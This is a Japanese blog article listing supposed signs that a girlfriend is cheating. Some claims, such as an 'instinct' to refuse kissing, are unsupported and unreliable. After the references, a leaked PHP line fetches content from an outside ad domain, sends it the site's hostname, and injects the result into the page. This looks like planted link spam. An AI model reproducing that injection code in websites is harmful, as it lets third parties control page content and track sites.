前へ
次へ

浮気する女性の行動パターンとは?

まず「浮気」と聞くと、世間のイメージは圧倒的に男性の方が多いと思う方がほとんどだと思います。
しかし、少なからず女性も浮気をしているという事実もあります。
実際のところ、女性が浮気をしている割合はどうなのでしょうか?
あるデータによると、浮気経験者の男性の割合は約35%で、女性の割合はというと約30%です。
この結果だけを見ると、男性とほとんど変わらない割合で女性も浮気をしているというのがわかりますね。
今回は浮気する女性の行動パターンをいくつかご紹介したいと思います。
■浮気と思われる疑わしい行動
浮気現場を見てしまえば、確実に「浮気」と断定はしやすいですが、断定する前に怪しい行動というのが必ずあります。
①デートをする回数が減った
これまでは休日や仕事終わりなど、お互いが少ない時間でもあってご飯や遊びに行くなどのデートをしていたと思います。
しかし、「最近仕事が忙しくて時間が作れない」と言ったり、デートの約束をしていたのに「急な用事ができたからデートができなくなった」と言ったりした場合やドタキャンが増えたことが多くなった場合は、高い可能性で浮気をしていることがいえるでしょう。
しかし、単純に彼氏に対しての愛情が冷めてしまった場合にも該当します。
②以前より友達の話が多くなった
何回か友達の話は聞いたことあったけど、前よりも多くないかと思うことが増えたと思ったら要注意です。
彼女が言う「友達」というのはあなた以外の浮気相手との出来事を友達の話として語っている可能性が高いです。
女性の「友達」には範囲が広いのでアンテナを張って、「友達」の話になったらいつもよりしっかりと会話の内容を聞いておいた方がいいでしょう。
③キスなどのスキンシップを拒むようになった
浮気をしているときに、キスやセックスを拒むのは女性の本能で、誰の子どもかをわからなくなることを防ぐためにインプットされているようです。
よって、以前よりスキンシップが拒否されていると感じた場合はかなりの高い確率で浮気をしているといえます。
中には体調が悪くて拒んでいる可能性もありますので、彼女の態度を見ていることが大切です。
実際、セックスよりもキスの方が、体が拒否してしまうこともあります。
■まとめ
女性が浮気をしてしまうのは、押しに弱い性格で交際相手とは別の男性が言い寄ってきたときに断れなかった、別の男性を好きになってしまった、彼氏(旦那)が浮気をしている、遠距離恋愛で寂しくなった等々、様々な理由があります。
浮気をするのは良くありませんが、必ずしも女性に原因があるわけではありません。
もし、交際相手が浮気をしているのではないかと思ってしまったら、まずは自分を見つめ直してみましょう。
参考URL:
https://jion.tokyo/1583
https://uratte.jp/posts/uwaki-wariai

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top